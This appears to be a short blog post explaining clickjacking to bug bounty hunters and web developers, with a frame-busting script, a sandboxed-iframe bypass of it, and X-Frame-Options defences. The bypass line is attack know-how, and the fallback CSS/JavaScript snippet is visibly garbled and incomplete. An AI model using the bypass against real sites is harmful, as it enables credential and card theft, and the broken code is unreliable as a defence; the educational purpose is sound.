Clickjacking - Web Application Security

Posted on at

Hey guys,

I just wanted to share some info about Clickjacking. It's basically low to medium risked issue but the sometimes the risk depends upon the site. I'm writing this note for Bug bounty hunters & Web developers.

I'm sure you guys already have knowledge about Clickjacking but in case if you don't know yet, Read the below paragraph to understand it easily otherwise skip it.

What is Clickjacking? If a website allows it self to be iframed, I mean if you put a site between this html code <iframe src=""> and upon executing this code, If you're able to see the site it means the site is vulnerable to Clickjacking. Now another question is how does it affects? Let me write according to my own thinking and way. Suppose there is a page on site which asks users to enter Credit Card details & if the site is vulnerable to Clickjacking, The attacker iframes the website and through html and css the attacker put fake fields above the real fields of the site and ofcourse those fake fields will submit data to hackers and the hacker put that page somewhere on the web. If somehow, a victim visits the page he/she will think that it's real site asking me the details and will enter the details and attacker will receive the data. This vulnerability is in the category of "Trust Based Exploits" as well.

I Hope You're Not Using This Code To Protect Your Site For Clickjacking: If own a website and you're using below code to save your website against clickjacking then be worried.

if (self !== top) {
top.location = self.location;

Above code actually immediately redirect the user to the real site if it's opened within Iframes but the reason to not to use it is that because there is a way to bypass this protection. Suppose you've a site with the url "" and you're using that code so it can be bypassed through below code:

<iframe src="" sandbox="allow-forms allow-scripts">

In fact, This protection code is not being used by everyone but still some or I guess many people are using it. If you're a developer, Make sure you're not using this protection atleast and if you're bug bounty hunter, make sure you check the site if it has this protection then bypass it and report it.

How should I protect my site from Clickjacking? Well, The easiest way is to put the below code in your .htaccess

If you want to put iframes in your website but don't want others to iframe you: Header append X-FRAME-OPTIONS "SAMEORIGIN"

If you don't have iframes in your website and don't want anyone else to iframe you: Header append X-FRAME-OPTIONS "DENY"

I am getting 500 error: Sometimes due to the structure or configuration of the site, Putting those codes won't work. It'll show Internal Server Error upon visiting. So I recommend you to use the below code. Put it in between <head> </head> tag.

 <style id="cj">
body { display:none !important;}
<script type="text/javascript">
if (self === top){var
body { display:block !important; } </style>

I hope you like this article! And this is the first time I've wrote such a long article related to Web Security!

About the author